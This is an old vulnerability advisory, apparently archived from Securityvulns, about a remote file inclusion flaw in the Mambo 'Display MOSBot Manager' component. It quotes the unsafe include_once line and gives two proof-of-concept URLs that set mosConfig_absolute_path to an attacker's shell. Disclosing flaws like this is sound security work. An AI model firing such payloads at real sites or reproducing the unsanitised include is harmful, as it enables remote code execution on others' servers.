Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13995
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

            ###########################################################################################
            #                       Aria-Security.net Advisory                                        #
            #                       Discovered  by: O.U.T.L.A.W                                       #                     #                       < www.Aria-security.net >                                         #
            #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                              #
            #                                                                                         #
            ###########################################################################################

Software: Mambo Component - Display MOSBot Manager

Attack method: Remote File Inclusion

Source:

include_once( "".$mosConfig_absolute_path."/administrator/components/". $component_directory ."/toolbar.".


Proof of Concept:

http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell

http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell

----------------------------------------------------------

Contact : Outlaw@aria-security.net